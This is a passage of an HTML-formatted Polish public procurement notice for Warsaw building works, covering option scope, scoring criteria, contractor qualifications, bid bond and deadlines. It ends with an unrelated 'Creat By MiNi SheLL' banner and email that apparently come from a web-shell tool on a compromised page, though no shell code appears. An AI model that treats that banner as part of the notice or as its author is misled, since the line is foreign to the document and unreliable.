odpowiednie zastosowanie w odniesieniu do przedmiotu Umowy objętego prawem opcji, wyłączając przypadki w których w Umowie mowa jest o regulacjach dotyczących opcji (termin, wynagrodzenie). <br/>6) Przedmiot umowy w zakresie prawa opcji obejmuje nw. zakres: <br/>1) teren zewnętrzny – remont placów zabaw, nowe nawierzchnie, zabawki, domek na zabawki, donice – warzywniak oraz zieleń – część I,<br/>2) wykonanie i montaż łamaczy światła – część II.<br/>7) Szczegółowy zakres opcji określony jest w Dokumentacji. Zamawiający zastrzega, że przewidziana opcja została podzielona na 2 części. Zamawiający może skorzystać z dwóch części lub z jednej części.<br/>8) Zamawiający jest uprawniony do skorzystania z prawa opcji w okresie do ośmiu miesięcy od dnia zawarcia umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>1)	w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał1 (zakończył) w sposób należyty co najmniej 2 roboty budowlane a każda z nich:<br/>	o wartości nie mniejszej niż 3 000 000,00 złotych brutto <br/>oraz<br/>	polegająca na budowie, przebudowie, remoncie budynku2 z wykonaniem robót budowlanych wielobranżowych3<br/><br/>UWAGA!:<br/>¹ Za wykonaną robotę Zamawiający uzna taką robotę, której przedmiot został odebrany przez Zamawiającego jako wykonany w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończony.<br/>2 Przez budynek należy rozumieć budynek należący do jednej z kategorii: IX, XI-XIV (kategorie zdefiniowane w załączniku do ustawy z dnia z dnia 7 lipca 1994 r Prawo budowlane (Dz.U. z 2021 po. 2351 ze zm.).<br/>3 Przez roboty wielobranżowe należy rozumieć min. roboty konstrukcyjno-budowlane, elektryczne, sanitarne i wykończeniowe.<br/>UWAGA2!:<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego / Wykonawców polegających na potencjale podmiotu trzeciego w celu wykazania spełnienia warunku udziału w postępowaniu, Zamawiający wymaga, aby co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego / jeden podmiot trzeci, wykazał się doświadczeniem w pełnym zakresie wymaganym przez Zamawiającego.<br/>Tym samym, Zamawiający nie dopuszcza tzw. „prostego sumowania potencjałów”, a wykazanie się przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia / przez Wykonawcę i podmiot trzeci / przez dwa podmioty trzecie, realizacją tylko jednej roboty budowlanej oznaczać będzie brak wykazania spełnienia warunku udziału w postępowaniu.<br/>2)	dysponuje osobami zdolnymi do wykonania zamówienia, a w szczególności co najmniej jedną osobą:<br/>a)	skierowaną na stanowisko kierownika budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej;<br/>b)	skierowaną na stanowisko kierownika robót sanitarnych posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, instalacji i urządzeń gazowych, wentylacyjnych wodociągowych i kanalizacyjnych;<br/>c)	skierowaną na stanowisko kierownika robót elektrycznych posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych <br/>Uwaga: <br/>Zamawiający dopuszcza łączenie powyższych funkcji pod warunkiem posiadania przez osobę kwalifikacji odpowiadających wymaganiom dla każdej z wymienionych funkcji. <br/>Uprawnienia budowlane winny być wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. 2021 poz. 2351) oraz Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (t.j. Dz. U. 2019 poz. 831) lub odpowiadające im inne ważne uprawnienia budowlane, w zakresie adekwatnym do przedmiotu zamówienia, wydane na mocy wcześniej obowiązujących przepisów oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U. 2021 poz. 1646). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>1.	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – Załącznik nr 3 do SWZ<br/>Uwaga!<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi wykonawcami, wykaz o którym mowa powyżej dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/><br/>2.	wykaz osób (zgodny z załącznikiem nr 4 do SWZ) skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Sposób i forma przekazania oświadczeń i dokumentów został określony w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 roku, w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. 2020 poz. 2452).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w<br/>kwocie: 50 000 zł (słownie: pięćdziesiąt tysięcy złotych 00/100). Szczegółowe informacje znajdują się w Rozdziale II pkt 14 SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, do oferty należy załączyć:<br/>a)	Oświadczenie z art. 117 ust. 4 ustawy Pzp (załącznik nr 5 do SWZ). Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym.<br/>b)	Oświadczenie o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu – Załącznik nr 1 do SWZ, składa każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia - Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym.<br/>Oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/><br/>c)	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika. <br/>Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo powinno powinno zawierać <br/>w szczególności wskazanie:<br/>	postępowania o zamówienie publiczne, którego dotyczy,<br/>	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>	ustanowionego pełnomocnika oraz zakresu jego umocowania <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający wskazuje, że przewidziane zmiany umowy zostały przewidziane w projektowanych postanowieniach umowy -<br/>załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-29 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-29 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy z postępowania wykonawców, wobec których zachodzą podstawy wykluczenia, o których mowa w<br/>art. 108 ust. 1 ustawy Pzp oraz z art. 109 ust. 1 pkt 5 i 7 ustawy Pzp oraz z art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2022 poz. 835)

Creat By MiNi SheLL
Email: jattceo@gmail.com